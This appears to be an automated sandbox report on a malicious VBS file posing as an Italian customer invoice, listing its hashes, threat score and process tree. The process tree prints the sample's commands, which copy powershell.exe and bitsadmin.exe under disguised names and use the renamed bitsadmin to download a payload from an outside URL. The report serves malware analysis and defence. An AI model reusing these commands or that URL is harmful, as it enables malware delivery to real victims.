Overview

overview

8

Static

static

Fatt_clien...4H.vbs

windows7_x64

8

Fatt_clien...4H.vbs

windows10_x64

8

Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13-07-2020 07:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fatt_cliente_STRPRI81C06H264H.vbs

  • Size

    3KB

  • MD5

    f8f845a5680b862bb8cbc3f0963e8a24

  • SHA1

    132a39312e13dafab31cca938c64745fd7a82b29

  • SHA256

    e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3

  • SHA512

    e5772c837fae26bb4cf2cd8b4c0adae3f652faf74afed8fe7894fffea2eedce0296c147bef58e1a24c3239bf9ed076c4747c1263d4b472172a1469d2c6afe430

Score
8/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 10 IoCs
  • Executes dropped EXE 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_STRPRI81C06H264H.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:284
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ziXRgjlH.exe
      2⤵
        PID:304
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\iXRgjlH.exe
        2⤵
          PID:1076
        • C:\Users\Admin\AppData\Roaming\iXRgjlH.exe
          "C:\Users\Admin\AppData\Roaming\iXRgjlH.exe" /transfer pJVFLY /download https://peliculadeestreno.com/libuna/STRPRI81C06H264H/en.jpg C:\Users\Admin\AppData\Roaming\en.jpg
          2⤵
          • Executes dropped EXE
          PID:1504

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads